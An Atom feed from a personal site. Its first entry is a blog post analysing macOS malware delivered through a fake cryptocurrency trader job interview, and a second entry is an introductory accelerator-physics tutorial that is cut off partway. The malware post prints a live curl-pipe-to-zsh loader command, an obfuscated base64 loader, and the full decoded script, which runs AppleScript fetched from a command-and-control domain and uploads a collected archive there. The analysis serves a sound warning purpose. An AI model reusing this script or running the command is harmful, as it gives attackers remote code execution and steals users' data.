<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://fotisgiasemis.com/feed.xml" rel="self" type="application/atom+xml" /><link href="https://fotisgiasemis.com/" rel="alternate" type="text/html" /><updated>2026-03-06T15:34:04+01:00</updated><id>https://fotisgiasemis.com/feed.xml</id><title type="html">Fotis I. Giasemis</title><subtitle>Personal page of Fotis Giasemis: Quantitative Researcher, Marie Curie PhD Fellow on Machine Learning at CERN, with a background in Theoretical Physics from Oxford.</subtitle><author><name> </name></author><entry><title type="html">A Fake Quant Interview Tried to Hack My Mac – So I Reverse Engineered the Malware They Sent Me</title><link href="https://fotisgiasemis.com/blog/fake-quant-interview-malware/" rel="alternate" type="text/html" title="A Fake Quant Interview Tried to Hack My Mac – So I Reverse Engineered the Malware They Sent Me" /><published>2026-03-06T00:00:00+01:00</published><updated>2026-03-06T00:00:00+01:00</updated><id>https://fotisgiasemis.com/blog/fake-quant-interview-malware</id><content type="html" xml:base="https://fotisgiasemis.com/blog/fake-quant-interview-malware/"><![CDATA[<p>A LinkedIn quant interview required me to run a <code class="language-plaintext highlighter-rouge">curl | zsh</code> command.</p>

<p>Instead, I reverse engineered the payload and discovered macOS malware.</p>

<p><img src="/assets/fake-interview-malware/thumbnail.png" alt="thumbnail" /></p>

<p>In the era of Generative AI, <strong>social engineering attacks have reached unprecedented levels of sophistication</strong>. No longer are scams limited to targeting non-technical users. Even engineers, quants, and security-aware developers can now be targeted through highly convincing workflows – including fake job interviews. This type of attack is a growing category of <strong>fake job interview malware</strong> targeting professionals in this space.</p>

<p>Recently, I applied to what looked like a legitimate <strong>quant/algorithmic trading position</strong>. What followed was a surprisingly elaborate attack that ultimately tried to install <strong>macOS malware on my machine</strong>.</p>

<p>Instead of running the installer, I decided to <strong>reverse engineer the payload</strong> to understand exactly what it was doing.</p>

<!--more-->

<h2 id="the-setup">The Setup</h2>

<p>You see a <strong>quant / algorithmic trader job posting on LinkedIn</strong>. Sounds interesting.</p>

<p>You look up the company. The company seems small, but their <strong>website looks legitimate</strong>. There are several associated members on LinkedIn, and the company is allegedly founded in 2018.</p>

<p>Nothing obviously suspicious.</p>

<p>So you apply.</p>

<p>A few days later you receive an email:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
Hi Fotis,

Thank you for applying for the Cryptocurrency Trader
position at [COMPANY REDACTED]. We've had a chance
to review your profile and would love to move forward
with a few quick clarifications.

Could you please let us know:

* Your availability to start
* Whether you're open to remote work
* Your salary expectations
* Your years of experience in this field

Additionally, we'd appreciate a brief sentence or two
on why this role interests you.

Feel free to reply directly to this email - short
answers are perfectly fine.
Looking forward to hearing from you.

Best regards,
[NAME REDACTED]
[COMPANY REDACTED]

</code></pre></div></div>

<p>You reply to the email.</p>

<p>Shortly after, <strong>good news</strong>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
Hi Fotis,

Good news! After reviewing your application for the
Cryptocurrency Trader position at [COMPANY REDACTED],
we're very interested in learning more about you and
potentially moving forward together.

We'd love to hold a meeting with you to discuss the
role in more detail. A calendar invitation has been
sent to you - please choose a time from the available
time slots.

We're really looking forward to meeting you and
learning more about your experience.

Best regards,
[NAME REDACTED]
[COMPANY REDACTED]

</code></pre></div></div>

<h2 id="the-attack">The Attack</h2>

<p>The calendar invitation arrives in a separate email.</p>

<p><img src="/assets/fake-interview-malware/meeting-invitation.png" alt="invitation" /></p>

<p>The meeting link directs you to a platform called <strong>Cozyo</strong>.</p>

<p><img src="/assets/fake-interview-malware/cozyo-1.png" alt="cozyo-1" />
<img src="/assets/fake-interview-malware/cozyo-2.png" alt="cozyo-2" /></p>

<p>The website looks fairly professional. Nothing seems suspicious so far.</p>

<p>So I tried to join the meeting.</p>

<p>That’s when the <strong>first red flag appeared</strong>.</p>

<blockquote>
  <p>You cannot join the meeting for the interview on the browser
You must download their app.</p>
</blockquote>

<p>Well, I guess some software companies tend to have their own annoying policies, so maybe that is not outrageous. So, let’s download the app for macOS:</p>

<p><img src="/assets/fake-interview-malware/cozyo-3.png" alt="cozyo-3" />
<img src="/assets/fake-interview-malware/cozyo-4.png" alt="cozyo-4" /></p>

<h2 id="the-suspicious-installer">The Suspicious Installer</h2>

<p>Instead of a normal <code class="language-plaintext highlighter-rouge">.dmg</code> or <code class="language-plaintext highlighter-rouge">.pkg</code> installer, the full <strong>terminal command</strong> in the instructions was:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-kfsSL</span> http://parityfinancialgroup.com/curl/bb48f1398db2f86572012201720e941023c1c99781123369a09e463634073fab | zsh
</code></pre></div></div>

<p>At this point the alarm bells started ringing.</p>

<h2 id="why-this-command-is-dangerous">Why This Command Is Dangerous</h2>

<p>Let’s break down what this command does.</p>

<ol>
  <li><code class="language-plaintext highlighter-rouge">curl</code> downloads a script from</li>
</ol>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://parityfinancialgroup.com/...
</code></pre></div></div>

<p>Flags used:</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">-k</code> → allows <code class="language-plaintext highlighter-rouge">curl</code> to make an “insecure” SSL connection</li>
  <li><code class="language-plaintext highlighter-rouge">-f</code> → fail silently on errors</li>
  <li><code class="language-plaintext highlighter-rouge">-s</code> → silent mode</li>
  <li><code class="language-plaintext highlighter-rouge">-S</code> → show errors</li>
  <li><code class="language-plaintext highlighter-rouge">-L</code> → follow redirects</li>
</ul>

<p>Then the critical part:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>| zsh
</code></pre></div></div>

<p>This <strong>pipes the downloaded content directly into your shell</strong>, meaning the script is <strong>executed immediately without you ever seeing it</strong>.</p>

<p>Effectively the command means:</p>

<blockquote>
  <p>Download unknown code from a random server and execute it immediately.</p>
</blockquote>

<p>That is <strong>one of the most common patterns used by malware installers</strong>.</p>

<p>Even worse, there were several red flags:</p>

<ul>
  <li>Domain <strong>does not match cozyo.app</strong></li>
  <li>Uses <strong>HTTP instead of HTTPS</strong></li>
  <li>Uses <strong><code class="language-plaintext highlighter-rouge">-k</code> to bypass secure connection protocols</strong></li>
  <li>Executes <strong>remote code directly via <code class="language-plaintext highlighter-rouge">| zsh</code></strong></li>
  <li>Uses a <strong>long hash-like URL</strong>, typical for payload loaders</li>
</ul>

<p>At this point I was almost certain the installer was malicious.</p>

<p>Instead of executing it, I downloaded the script and inspected it safely.</p>

<h2 id="inspecting-the-installer-script">Inspecting the Installer Script</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-fsSL</span> http://parityfinancialgroup.com/curl/bb48f1398db2f86572012201720e941023c1c99781123369a09e463634073fab <span class="nt">-o</span> suspicious_script.sh
</code></pre></div></div>

<p>Then inspect it with <code class="language-plaintext highlighter-rouge">cat</code>. Inside we find this:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/zsh</span>
<span class="nv">d10152</span><span class="o">=</span><span class="si">$(</span><span class="nb">base64</span> <span class="nt">-D</span> <span class="o">&lt;&lt;</span><span class="sh">'</span><span class="no">PAYLOAD_m236274904887</span><span class="sh">' | gunzip
...
</span><span class="no">PAYLOAD_m236274904887
</span><span class="si">)</span>
<span class="nb">eval</span> <span class="s2">"</span><span class="nv">$d10152</span><span class="s2">"</span>

</code></pre></div></div>

<p>That script clearly tried to hide the actual intended commands: it’s a so-called <strong>obfuscated loader</strong>.</p>

<p>What is happening here?</p>

<ol>
  <li>A large block of <strong>Base64-encoded data</strong></li>
  <li>That data is <strong>gzip compressed</strong></li>
  <li>The script decodes it</li>
  <li>Then runs it with <code class="language-plaintext highlighter-rouge">eval</code></li>
</ol>

<p>Meaning the <strong>real payload is hidden inside the encoded block</strong>.</p>

<h2 id="decoding-the-hidden-payload">Decoding the Hidden Payload</h2>

<p>We can safely decode it <strong>without executing anything</strong>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sed</span> <span class="nt">-n</span> <span class="s1">'/PAYLOAD_/,/PAYLOAD_/p'</span> suspicious_script.sh | <span class="se">\</span>
<span class="nb">sed</span> <span class="s1">'1d;$d'</span> | <span class="se">\</span>
<span class="nb">base64</span> <span class="nt">-D</span> | <span class="nb">gunzip</span> <span class="o">&gt;</span> decoded_script.sh
</code></pre></div></div>

<p>Now inspect the decoded script:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/zsh</span>
daemon_function<span class="o">()</span> <span class="o">{</span>
    <span class="nb">exec</span> &lt;/dev/null
    <span class="nb">exec</span> <span class="o">&gt;</span>/dev/null
    <span class="nb">exec </span>2&gt;/dev/null
    <span class="nb">local </span><span class="nv">domain</span><span class="o">=</span><span class="s2">"parityfinancialgroup.com"</span>
    <span class="nb">local </span><span class="nv">token</span><span class="o">=</span><span class="s2">"bb48f1398db2f86572012201720e941023c1c99781123369a09e463634073fab"</span>
    <span class="nb">local </span><span class="nv">api_key</span><span class="o">=</span><span class="s2">"5190ef1733183a0dc63fb623357f56d6"</span>
    <span class="nb">local </span><span class="nv">file</span><span class="o">=</span><span class="s2">"/tmp/osalogging.zip"</span>
    <span class="k">if</span> <span class="o">[</span> <span class="nv">$# </span><span class="nt">-gt</span> 0 <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span>curl <span class="nt">-k</span> <span class="nt">-s</span> <span class="nt">--max-time</span> 30 <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"</span> <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"api-key: </span><span class="nv">$api_key</span><span class="s2">"</span> <span class="se">\</span>
            <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/dynamic?txd=</span><span class="nv">$token</span><span class="s2">&amp;pwd=</span><span class="nv">$1</span><span class="s2">"</span> | osascript
    <span class="k">else
        </span>curl <span class="nt">-k</span> <span class="nt">-s</span> <span class="nt">--max-time</span> 30 <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"</span> <span class="se">\</span>
            <span class="nt">-H</span> <span class="s2">"api-key: </span><span class="nv">$api_key</span><span class="s2">"</span> <span class="se">\</span>
            <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/dynamic?txd=</span><span class="nv">$token</span><span class="s2">"</span> | osascript
    <span class="k">fi
    if</span> <span class="o">[</span> <span class="nv">$?</span> <span class="nt">-ne</span> 0 <span class="o">]</span><span class="p">;</span> <span class="k">then
        </span><span class="nb">exit </span>1
    <span class="k">fi
    if</span> <span class="o">[[</span> <span class="o">!</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> <span class="o">||</span> <span class="o">!</span> <span class="nt">-s</span> <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> <span class="o">]]</span><span class="p">;</span> <span class="k">then
        return </span>1
    <span class="k">fi
    </span><span class="nb">local </span><span class="nv">CHUNK_SIZE</span><span class="o">=</span><span class="k">$((</span><span class="m">10</span> <span class="o">*</span> <span class="m">1024</span> <span class="o">*</span> <span class="m">1024</span><span class="k">))</span>
    <span class="nb">local </span><span class="nv">MAX_RETRIES</span><span class="o">=</span>8
    <span class="nb">local </span><span class="nv">upload_id</span><span class="o">=</span><span class="si">$(</span><span class="nb">date</span> +%s<span class="si">)</span>-<span class="si">$(</span>openssl rand <span class="nt">-hex</span> 8 2&gt;/dev/null <span class="o">||</span> <span class="nb">echo</span> <span class="nv">$RANDOM$RANDOM</span><span class="si">)</span>
    <span class="nb">local </span>total_size
    <span class="nv">total_size</span><span class="o">=</span><span class="si">$(</span><span class="nb">stat</span> <span class="nt">-f</span> %z <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> 2&gt;/dev/null <span class="o">||</span> <span class="nb">stat</span> <span class="nt">-c</span> %s <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span><span class="si">)</span>
    <span class="k">if</span> <span class="o">[[</span> <span class="nt">-z</span> <span class="s2">"</span><span class="nv">$total_size</span><span class="s2">"</span> <span class="o">||</span> <span class="s2">"</span><span class="nv">$total_size</span><span class="s2">"</span> <span class="nt">-eq</span> 0 <span class="o">]]</span><span class="p">;</span> <span class="k">then
        return </span>1
    <span class="k">fi
    </span><span class="nb">local </span><span class="nv">total_chunks</span><span class="o">=</span><span class="k">$((</span> <span class="o">(</span>total_size <span class="o">+</span> CHUNK_SIZE <span class="o">-</span> <span class="m">1</span><span class="o">)</span> <span class="o">/</span> CHUNK_SIZE <span class="k">))</span>
    <span class="nb">local </span><span class="nv">i</span><span class="o">=</span>0
    <span class="k">while</span> <span class="o">((</span> i &lt; total_chunks <span class="o">))</span><span class="p">;</span> <span class="k">do
        </span><span class="nb">local </span><span class="nv">offset</span><span class="o">=</span><span class="k">$((</span>i <span class="o">*</span> CHUNK_SIZE<span class="k">))</span>
        <span class="nb">local </span><span class="nv">chunk_size</span><span class="o">=</span><span class="nv">$CHUNK_SIZE</span>
        <span class="o">((</span> offset + chunk_size <span class="o">&gt;</span> total_size <span class="o">))</span> <span class="o">&amp;&amp;</span> <span class="nv">chunk_size</span><span class="o">=</span><span class="k">$((</span>total_size <span class="o">-</span> offset<span class="k">))</span>
        <span class="nb">local </span><span class="nv">success</span><span class="o">=</span>0
        <span class="nb">local </span><span class="nv">attempt</span><span class="o">=</span>1
        <span class="k">while</span> <span class="o">((</span> attempt &lt;<span class="o">=</span> MAX_RETRIES <span class="o">&amp;&amp;</span> success <span class="o">==</span> 0 <span class="o">))</span><span class="p">;</span> <span class="k">do
            </span><span class="nv">http_code</span><span class="o">=</span><span class="si">$(</span><span class="nb">dd </span><span class="k">if</span><span class="o">=</span><span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span> <span class="nv">bs</span><span class="o">=</span>1 <span class="nv">skip</span><span class="o">=</span><span class="nv">$offset</span> <span class="nv">count</span><span class="o">=</span><span class="nv">$chunk_size</span> 2&gt;/dev/null | <span class="se">\</span>
                curl <span class="nt">-k</span> <span class="nt">-s</span> <span class="nt">-X</span> PUT <span class="se">\</span>
                <span class="nt">--data-binary</span> @- <span class="se">\</span>
                <span class="nt">-H</span> <span class="s2">"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36"</span> <span class="se">\</span>
                <span class="nt">-H</span> <span class="s2">"api-key: </span><span class="nv">$api_key</span><span class="s2">"</span> <span class="se">\</span>
                <span class="nt">--max-time</span> 180 <span class="se">\</span>
                <span class="nt">-o</span> /dev/null <span class="se">\</span>
                <span class="nt">-w</span> <span class="s2">"%{http_code}"</span> <span class="se">\</span>
                <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/gate?buildtxd=</span><span class="nv">$token</span><span class="s2">&amp;upload_id=</span><span class="nv">$upload_id</span><span class="s2">&amp;chunk_index=</span><span class="nv">$i</span><span class="s2">&amp;total_chunks=</span><span class="nv">$total_chunks</span><span class="s2">"</span> 2&gt;/dev/null<span class="si">)</span>
            <span class="nv">curl_status</span><span class="o">=</span><span class="nv">$?</span>
            <span class="k">if</span> <span class="o">[[</span> <span class="nv">$curl_status</span> <span class="nt">-eq</span> 0 <span class="o">&amp;&amp;</span> <span class="nv">$http_code</span> <span class="nt">-ge</span> 200 <span class="o">&amp;&amp;</span> <span class="nv">$http_code</span> <span class="nt">-lt</span> 300 <span class="o">]]</span><span class="p">;</span> <span class="k">then
                </span><span class="nv">success</span><span class="o">=</span>1
            <span class="k">else</span>
                <span class="o">((</span>attempt++<span class="o">))</span>
                <span class="nb">sleep</span> <span class="k">$((</span><span class="m">3</span> <span class="o">+</span> attempt <span class="o">*</span> <span class="m">2</span><span class="k">))</span>
            <span class="k">fi
        done
        if</span> <span class="o">((</span> success <span class="o">==</span> 0 <span class="o">))</span><span class="p">;</span> <span class="k">then
            return </span>1
        <span class="k">fi</span>
        <span class="o">((</span>i++<span class="o">))</span>
    <span class="k">done
    </span><span class="nb">rm</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$file</span><span class="s2">"</span>
    <span class="k">return </span>0
<span class="o">}</span>
<span class="k">if </span>daemon_function <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span> &amp; <span class="k">then
    </span><span class="nb">exit </span>0
<span class="k">else
    </span><span class="nb">exit </span>1
<span class="k">fi</span>
</code></pre></div></div>

<p>This reveals the actual malware logic.</p>

<h2 id="what-the-malware-actually-does">What the Malware Actually Does</h2>

<p>The script defines a function:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>daemon_function<span class="o">()</span> <span class="o">{</span> ... <span class="o">}</span>
</code></pre></div></div>

<p>Then launches it in the background:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>daemon_function <span class="s2">"</span><span class="nv">$@</span><span class="s2">"</span> &amp;
</code></pre></div></div>

<p>Meaning it tries to <strong>run silently as a background process</strong>.</p>

<h3 id="step-1--hide-execution">Step 1 — Hide Execution</h3>

<p>The first lines redirect all I/O to <code class="language-plaintext highlighter-rouge">/dev/null</code>:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">exec</span> &lt;/dev/null
<span class="nb">exec</span> <span class="o">&gt;</span>/dev/null
<span class="nb">exec </span>2&gt;/dev/null
</code></pre></div></div>

<p>This ensures:</p>

<ul>
  <li>no terminal output</li>
  <li>no visible errors</li>
  <li>no trace for the user</li>
</ul>

<p>A <strong>classic stealth technique</strong>.</p>

<h3 id="step-2--contact-command-and-control-server">Step 2 — Contact Command-and-Control Server</h3>

<p>The script defines:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">domain</span><span class="o">=</span><span class="s2">"parityfinancialgroup.com"</span>
<span class="nv">token</span><span class="o">=</span><span class="s2">"bb48f1398db2..."</span>
<span class="nv">api_key</span><span class="o">=</span><span class="s2">"5190ef1733..."</span>
<span class="nv">file</span><span class="o">=</span><span class="s2">"/tmp/osalogging.zip"</span>
</code></pre></div></div>

<p>Then executes:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl ... <span class="s2">"http://</span><span class="nv">$domain</span><span class="s2">/dynamic?txd=</span><span class="nv">$token</span><span class="s2">"</span> | osascript
</code></pre></div></div>

<p>This is the most dangerous line.</p>

<p><code class="language-plaintext highlighter-rouge">osascript</code> executes <strong>AppleScript commands</strong>.</p>

<p>So whatever the server returns is <strong>executed directly on the system</strong>.</p>

<p>That effectively gives the attacker <strong>remote code execution</strong>.</p>

<p>Possible actions include:</p>

<ul>
  <li>accessing local files</li>
  <li>requesting system permissions</li>
  <li>running shell commands</li>
  <li>downloading additional payloads</li>
  <li>interacting with macOS dialogs</li>
</ul>

<h3 id="step-3--data-exfiltration">Step 3 — Data Exfiltration</h3>

<p>The script then checks for a file:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/tmp/osalogging.zip
</code></pre></div></div>

<p>If present, it uploads it to the attacker server.</p>

<p>The file is:</p>

<ul>
  <li>split into <strong>10 MB chunks</strong></li>
  <li>uploaded via HTTP <code class="language-plaintext highlighter-rouge">PUT</code> requests</li>
</ul>

<p>Example:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-X</span> PUT http://parityfinancialgroup.com/gate ...
</code></pre></div></div>

<p>This is typical <strong>data exfiltration malware behavior</strong>.</p>

<p>The workflow becomes clear:</p>

<ol>
  <li>Receive commands from attacker server</li>
  <li>Execute them via AppleScript</li>
  <li>Collect local data</li>
  <li>Upload it back in chunks</li>
</ol>

<h2 id="lessons-learned">Lessons Learned</h2>

<p>This attack demonstrates how far <strong>social-engineering campaigns</strong> have evolved. It is also similar to the recent attacks on VS Code and GitHub Copilot users, involving prompt injections and other tools to exploit the AI agentic capabilities, allowing Copilot to interact directly with the developer’s system and external tools.</p>

<p>The entire workflow was convincing:</p>

<ul>
  <li>legitimate-looking job posting</li>
  <li>realistic company website</li>
  <li>LinkedIn presence</li>
  <li>professional email communication</li>
  <li>custom meeting platform</li>
</ul>

<p>The only real red flag appeared at the <strong>installation step</strong>.</p>

<p>Some important takeaways:</p>

<ol>
  <li><strong>Never run <code class="language-plaintext highlighter-rouge">curl | bash</code> or <code class="language-plaintext highlighter-rouge">curl | zsh</code> blindly.</strong></li>
  <li>Legitimate interview software should <strong>never require terminal commands to install</strong>.</li>
  <li>Always verify domains and download sources.</li>
  <li>If something feels unusual in a hiring process, <strong>stop and inspect first</strong>.</li>
</ol>

<p>One careless command would have given the attacker <strong>remote control of the machine and a channel for data exfiltration</strong>.</p>

<h2 id="aftermath">Aftermath</h2>

<p>A few days later, I received this follow-up email:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Hi Fotis,

We noticed you weren't able to join our scheduled 
meeting for the Cryptocurrency Trader role at 
[COMPANY REDACTED].

No worries - we understand things come up. Could 
you let us know what happened?

If you're still interested, you can reschedule 
here: [URL REDACTED]

Just reply to this email and let us know.

Best,
[COMPANY REDACTED]
</code></pre></div></div>

<p>Needless to say, I did not join the meeting.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="Quant" /><category term="Crypto" /><category term="Cybersecurity" /><summary type="html"><![CDATA[I applied to a quant trading job on LinkedIn and was invited to an interview. The meeting software required a suspicious curl command that turned out to be macOS malware. I reverse engineered the payload to see what it actually did.]]></summary></entry><entry><title type="html">Accelerator and Heavy Flavor Physics – Introductory Concepts</title><link href="https://fotisgiasemis.com/blog/accelerator-heavy-flavor-physics/" rel="alternate" type="text/html" title="Accelerator and Heavy Flavor Physics – Introductory Concepts" /><published>2025-12-06T00:00:00+01:00</published><updated>2025-12-06T00:00:00+01:00</updated><id>https://fotisgiasemis.com/blog/accelerator-heavy-flavor-physics</id><content type="html" xml:base="https://fotisgiasemis.com/blog/accelerator-heavy-flavor-physics/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>In this post, we delve into the primary field of focus of this text: high-energy particle physics. We begin by introducing fundamental concepts in accelerator physics, followed by an overview of the Standard Model (SM) and some key open questions in the field. Finally, we touch on heavy flavor physics in a bit more detail. This background will be necessary to understand and precisely describe the work from the physics point of view.</p>

<h2 id="accelerator-physics">Accelerator Physics</h2>

<h3 id="cylindrical-coordinates">Cylindrical Coordinates</h3>

<p>In accelerator physics, cylindrical coordinates \((\rho, \varphi, z)\) <a href="https://books.google.gr/books/about/Mathematical_Methods_for_Physics_and_Eng.html?id=Mq1nlEKhNcsC&amp;redir_esc=y">[Ref]</a> are often used, instead of Cartesian coordinates \((x,y,z)\). In this configuration, points are identified with respect to the main axis called cylindrical or longitudinal axis, and an auxiliary axis called the polar axis, as shown in Fig. 1. \(\rho\) denotes the perpendicular distance from the main axis, \(z\) denotes the distance along the main axis, and \(\varphi\) is the plane (or azimuthal) angle of the point of projection on the transverse plane. The beamline is naturally identified with the cylindrical axis of the coordinate system.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/cylindrical.png" alt="cylindrical" /></p>

<p><strong>Figure 1:</strong> A cylindrical coordinate system defined by an origin \(O\), a polar (radial) axis \(A\), and a longitudinal (axial) axis \(L\). Figure from <a href="https://commons.wikimedia.org/wiki/File:Coord_system_CY_1.svg">[Ref]</a>.</p>

<h3 id="pseudorapidity">Pseudorapidity</h3>

<p>In experimental particle physics, another frequently used spatial coordinate is the pseudorapidity \(\eta\) . It describes the angle between a particle’s momentum \(\mathbf{p}\) and the positive direction of the beam axis—identified with the \(z\)-direction. This angle is referred to as the polar angle \(\theta\), as shown in Fig. 2.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/angles.png" alt="angles" /></p>

<p><strong>Figure 2:</strong> The polar (\(\theta\)) and azimuthal (\(\varphi\)) angles. Adapted from <a href="https://tikz.net/axis3d/">[Ref]</a>.</p>

<p>Pseudorapidity is defined as <a href="https://books.google.gr/books/about/Introduction_to_High_energy_Heavy_ion_Co.html?id=Fnxvrdj2NOQC&amp;redir_esc=y">[Ref]</a>:</p>

<p>\[
    \eta = - \ln \left[ \tan \left( \frac{\theta}{2} \right) \right]\,,
\]
or inversely</p>

<p>\[
    \theta = 2 \arctan \left( e^{-\eta}\right) \,.
\]
As a function of the three-momentum \(\mathbf{p}\), pseudorapidity can be expressed as</p>

<p>\[
    \eta = \frac{1}{2} \ln \left( \frac{|\mathbf{p}| + p_L}{|\mathbf{p}| - p_L} \right)\,
\]
where \(p_L\) is the longitudinal component of the momentum, along the beam axis. Due to its desirable physical properties, this definition is highly favored in experimental particle physics.</p>

<p>From the above equation, we can see that when the momentum tends to be all along the beamline, i.e., \(p_L \rightarrow \lvert \mathbf{p} \rvert \) (\(\theta \rightarrow 0 \)), pseudorapidity blows up \(\eta \rightarrow \infty \). On the other hand, when most of the momentum is in transverse directions, \(p_L \rightarrow 0 \) (\(\theta \rightarrow 90^{\circ} \)), then \(\eta \rightarrow 0 \), as shown in Fig. 3.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/pseudorapidity.png" alt="pseudorapidity" /></p>

<p><strong>Figure 3:</strong> Values of pseudorapidity \(\eta\) versus polar angle \(\theta\). Figure from <a href="https://tikz.net/axis2d_pseudorapidity/">[Ref]</a>.</p>

<h3 id="beam-bunching">Beam Bunching</h3>

<p>In particle beams, in many modern experiments including the LHC, particles are distributed into pulses, or <em>bunches</em>. Bunched beams are common because most modern accelerators require bunching for acceleration <a href="https://www.osti.gov/biblio/5675075">[Ref]</a>.</p>

<p>At the LHC, after accelerating the particles in bunches, the two beams are focused resulting in the crossing of these bunches—the so-called <em>bunch crossing</em>, as shown in Fig. 4. These bunch crossings, also known as <em>events</em>, may result in one or multiple collisions between protons and consequently in the production of new particles. The number of these collisions during a bunch crossing is known as pile-up.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/bunches.png" alt="bunches" /></p>

<p><strong>Figure 4:</strong> Illustration of beam bunching utilized at the Large Hadron Collider at CERN. Adapted from <a href="https://naturphilosophie.co.uk/physics-13-tev-cranking-lhc/">[Ref]</a>.</p>

<h3 id="primary-and-secondary-vertices">Primary and Secondary Vertices</h3>

<p>Primary vertices are points in space where a particle collision occurred, resulting in the generation of other particles at this point, as shown in Fig. 5. The location of this point can be reconstructed from the tracks of particles emerging directly from the collision. Secondary (or displaced) vertices are points displaced from the primary vertex, where the decay of a long-lived particle occurred. These points can be reconstructed from the tracks of decay products that do not originate from the primary interaction.</p>

<p>Primary vertices are a crucial element of many physics analyses <a href="https://dx.doi.org/10.1088/1742-6596/119/3/032033">[Ref]</a>. The precise reconstruction of many processes, the identification of \(b\)- or \(\tau\)-jets, the reconstruction of exclusive
\(b\)-decays and the measurement of lifetimes of long-lived particles are all dependent upon the precise knowledge of the location of the primary vertex. Secondary vertices, on the other hand, are tools for identifying heavy flavor hadrons and \(\tau\) leptons <a href="https://dx.doi.org/10.1088/1742-6596/110/9/092009">[Ref]</a>.</p>

<p><img src="/assets/accelerator-heavy-flavor-physics/vertices.png" alt="vertices" /></p>

<p><strong>Figure 5:</strong> Illustration of Primary Vertices (PVs) and Secondary Vertices (SVs) in colliding-beam experiments. PVs are points in space where a primary particle collision occurred, and can reconstructed from the tracks of particles emerging directly from the collision. SVs, on the other hand, are points displaced from the PV where the decay of a long-lived particle occurred. They can be reconstructed from the tracks of decay products that do not originate from the primary interaction. Adapted from <a href="https://tikz.net/jet_btag/">[Ref]</a>.</p>

<h3 id="luminosity">Luminosity</h3>

<p><em>Luminosity</em> \(L\) is defined as the ratio of the number of events detected \(dN\) in a certain period of time \(dt\) and across a cross section \(\sigma\) <a href="https://cds.cern.ch/record/941318">[Ref]</a>:</p>

<p>\[
    L = \frac{1}{\sigma} \frac{dN}{dt} \,,
\]
and is often given units of \(\text{cm}^{-2} \cdot \text{s}^{-1}\). In practice, the luminosity depends on the parameters of the particle beam, such as the beam width and particle flow rate.</p>

<p><em>Integrated luminosity</em> \(L_{\text{int}}\) is defined as the integral of the luminosity with respect to time:</p>

<p>\[
    L_{\text{int}} = \int L \,dt = \frac{N}{\sigma} \,,
\]
where \(N\) is now the total number of collision events produced. \(L\) is frequently referred to as instantaneous luminosity, in order to emphasize the distinction between its integrated-over-time counterpart \(L_{\text{int}}\). Integrated luminosity, having units of \(1/\sigma\), is sometimes measured in inverse femtobarns \(\text{fb}^{-1}\). It measures the number of collisions produced per femtobarn of cross section.</p>

<p>These variables are useful quantities to evaluate the performance of a particle accelerator. In particular, most HEP collision experiments aim to maximize their luminosity, since a higher luminosity means more collisions and consequently a higher integrated luminosity means a larger volume of data available to be analyzed.</p>

<p>For beam-to-beam experiments, where the particles are accelerated in opposite directions before collided, like the majority of the time at the LHC, the instantaneous luminosity can be calculated as <a href="https://cds.cern.ch/record/941318">[Ref]</a>:</p>

<p>\[
    L = \frac{N^2 f N_b}{4 \pi \sigma_x \sigma_y} \,,
\]
where \(N\) denotes the number of particles per bunch, \(f\) is the revolution frequency, and \(N_b\) is the number of bunches in each beam. The transverse dimensions of the beam, assuming a Gaussian profile, are described by \(\sigma_x\) and \(\sigma_y\).</p>

<h3 id="impact-parameter">Impact Parameter</h3>

